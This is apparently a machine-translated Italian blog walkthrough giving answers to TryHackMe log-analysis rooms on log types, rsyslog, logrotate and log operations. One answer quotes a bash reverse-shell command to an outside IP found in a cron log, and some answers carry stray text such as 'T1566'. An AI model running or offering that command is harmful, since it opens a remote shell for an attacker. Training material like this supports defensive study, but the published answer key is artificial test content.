Abbiamo trattato un'introduzione alla registrazione in cui abbiamo discusso la logica della creazione dei log e il motivo per cui creiamo i log. I registri vengono creati e generati per tenere traccia delle prestazioni, analizzare gli incidenti di sicurezza e stabilire un modello da cui prevedere eventi futuri. I registri possono essere registri di sistema, registri di applicazioni, registri di sicurezza, registri di controllo, registri di server e registri di database. Il processo di gestione dei log inizia con la raccolta dei log, l'archiviazione in una posizione centrale, l'analisi dei log e quindi l'analisi utilizzando strumenti di analisi dei log e anche SIEM. Questo faceva parte TryHackMe Introduzione ai registri procedura dettagliata che fa parte del tracciato TryHackMe SOC Livello 2.

Questo post copre anche le risposte per Prova le operazioni di registro di HackMe Camera.

Note sullo studio OSCP

Il corso pratico completo sul Penetration Testing delle applicazioni Web

Punti salienti

I file di registro sono registrazioni di eventi salvati in un file in formato elenco. Possono includere tutti i tipi di informazioni sugli eventi accaduti in un determinato momento. Ogni dispositivo sulla rete crea file di registro, fornendoti così una cronologia di ciò che sta accadendo.
I log contengono in genere cinque aree con intestazione. Sono:

  • Timestamp: l'ora dell'evento. 
  • Livello di registro: quanto è grave o importante l'evento.
  • Nome utente: chi ha causato l'evento.
  • Servizio o applicazione: cosa ha causato l'evento.
  • Descrizione dell'evento: cosa è successo.

Tipi di file di registro

  • Registro eventi –registra informazioni sull'utilizzo del traffico di rete e tiene traccia dei tentativi di accesso, degli eventi dell'applicazione e dei tentativi di password non riusciti.
  • Registro di sistema (o syslog): registra gli eventi del sistema operativo, inclusi messaggi di avvio, modifiche del sistema, arresti, errori e avvisi.
  • Registro del server – contiene una registrazione delle attività in un documento di testo relativo a un server specifico in un periodo di tempo specifico.
  • Modifica registro – elenca le modifiche apportate a un'applicazione o a un file.
  • Registro della disponibilità – tiene traccia del tempo di attività, della disponibilità e delle prestazioni del sistema.
  • Autorizzazione e registro degli accessi – elenca chi sta accedendo ad applicazioni o file.
  • Registro delle risorse: fornisce informazioni sui problemi di connettività e su eventuali problemi di capacità.
  • Registri dell'applicazione Messaggi su applicazioni specifiche, inclusi stato, errori, avvisi, ecc.
  • Registri di controllo Attività legate alle procedure operative cruciali per la conformità normativa.
  • Registri di sicurezza Eventi di sicurezza come accessi, modifiche delle autorizzazioni, attività del firewall, ecc.
  • Registri di rete Traffico di rete, connessioni e altri eventi relativi alla rete.
  • Registri del database Attività all'interno di un sistema di database, come query e aggiornamenti.
  • Registri del server Web Richieste elaborate da un server Web, inclusi URL, codici di risposta, ecc.

Risposte in camera | TryHackMe Introduzione ai registri

Come si chiama il tuo collega che ha lasciato una nota sul tuo Desktop?

Perry

Qual è il percorso completo del file di registro suggerito per l'indagine iniziale?

T1566/var/log/gitlab/nginx/access.logT1566

In base all'elenco dei tipi di registro in questa attività, quale tipo di registro viene utilizzato dal file di registro specificato nella nota dell'Attività 2?

registro del server web

In base all'elenco dei formati di registro in questa attività, quale formato di registro viene utilizzato dal file di registro specificato nella nota dell'Attività 2?

combinato

Dopo aver configurato rsyslog per sshd, quale nome utente appare ripetutamente nei log sshd in /var/log/websrv-02/rsyslog_sshd.log, indicando tentativi di accesso non riusciti o forzatura bruta?

stansimon

Qual è l'indirizzo IP di SIEM-02 basato sul file di configurazione rsyslog /etc/rsyslog.d/99-websrv-02-cron.conf, che viene utilizzato per monitorare i messaggi cron?

10.10.10.101

In base ai log generati in /var/log/websrv-02/rsyslog_cron.log, quale comando viene eseguito dall'utente root?

/bin/bash -c “/bin/bash -i >& /dev/tcp/34.253.159.159/9999 0>&1”

In base alla configurazione di logrotate /etc/logrotate.d/99-websrv-02_cron.conf, quante versioni delle vecchie copie dei file di registro compressi verranno conservate?

24

In base alla configurazione di logrotate /etc/logrotate.d/99-websrv-02_cron.conf, qual è la frequenza di rotazione del log?

ogni ora

Quando si accede all'URL del visualizzatore di log per i file di log non elaborati non analizzati, quale errore viene visualizzato "/var/log/websrv-02/rsyslog_cron.log" quando si selezionano i diversi filtri?

nessun campo data

Qual è il processo di standardizzazione dei dati analizzati in un formato più facilmente leggibile e interrogabile?

Normalizzazione

Qual è il processo di consolidamento dei log normalizzati per migliorare l'analisi delle attività relative a uno specifico indirizzo IP?

Arricchimento

Risposte in camera | Prova le operazioni di registro di HackMe

Quale degli scopi di registro indicati sarebbe adatto a misurare il costo dell'utilizzo di un servizio?

Operativo

Quale degli scopi di registro indicati sarebbe adatto per esaminare i registri dell'applicazione per il miglioramento e la stabilità? 

Debug

Sei un consulente che lavora per una startup in crescita. In qualità di consulente, hai partecipato a una sessione di pianificazione della configurazione del registro. L'azienda per cui lavori sta lavorando per conformarsi all'elaborazione delle informazioni di pagamento. La serie di domande data è in discussione.

La risposta a quale domanda può essere "quanto menzionato nei requisiti PCI DSS"?

Quanto devi registrare?

La sessione continua e i tuoi compagni di squadra hanno bisogno del tuo aiuto; negozieranno per la registrazione del budget e dei dettagli dell'operazione. Come consulente, devi ricordare loro un punto vitale:

Quali requisiti non sono negoziabili?

requisiti operativi e di sicurezza

Il tuo team sta lavorando su policy per decidere quali log verranno archiviati e quale parte sarà disponibile per l'analisi.
Quale dei principi di registrazione indicati verrebbe implementato e migliorato?

Archiviazione e accessibilità

Il tuo team ha implementato un nuovissimo prodotto di registrazione API. Uno dei membri del team è stato incaricato di raccogliere i registri generati da quel nuovo prodotto. Il membro del team ha segnalato continui errori durante il trasferimento dei registri alla piattaforma di revisione.
In questo caso, quale delle difficoltà indicate si verifica?

Processo e archivio

In qualità di consulente, stai effettuando una valutazione completa del rischio e hai notato che uno dei team di sviluppo ha implementato uno script personalizzato per generare log per un vecchio sistema, che omette le registrazioni in alcune fasi.

Come lo chiameresti? (Errore o pratica?)

Errore

Videoprocedura dettagliata

, ,
Mostra commenti

Motasem

Circa l'autore

Creo note sulla sicurezza informatica, note di marketing digitale e corsi online. Fornisco anche consulenza di marketing digitale, inclusi ma non limitati a SEO, annunci Google e Meta e amministrazione CRM.

Visualizza articoli